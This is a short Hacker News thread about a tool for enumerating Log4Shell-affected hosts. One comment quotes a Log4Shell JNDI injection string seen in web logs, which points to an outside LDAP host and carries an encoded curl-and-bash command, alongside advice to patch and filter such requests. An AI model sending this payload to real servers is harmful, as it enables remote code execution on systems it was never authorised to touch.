[HN Gopher] Our new tool for enumerating hidden Log4Shell-affect...
___________________________________________________________________
Our new tool for enumerating hidden Log4Shell-affected hosts
Author : dnet
Score : 8 points
Date : 2021-12-12 20:25 UTC (2 hours ago)
(HTM) web link (blog.silentsignal.eu)
(TXT) w3m dump (blog.silentsignal.eu)
| elric wrote:
| We've been noticing attempted exploits in the wild. Attempts like
| these have started appearing in our logs:
|
| > /?x=${jndi:ldap://45.155.205.XXX:12344/Basic/Command/Base64/<ba
| se64 encoded call to curl & bash>
|
| Patch your tools, folks. If you can't do that, modify your
| ingress services and have them filter out stuff like this.
___________________________________________________________________
(page generated 2021-12-12 23:01 UTC)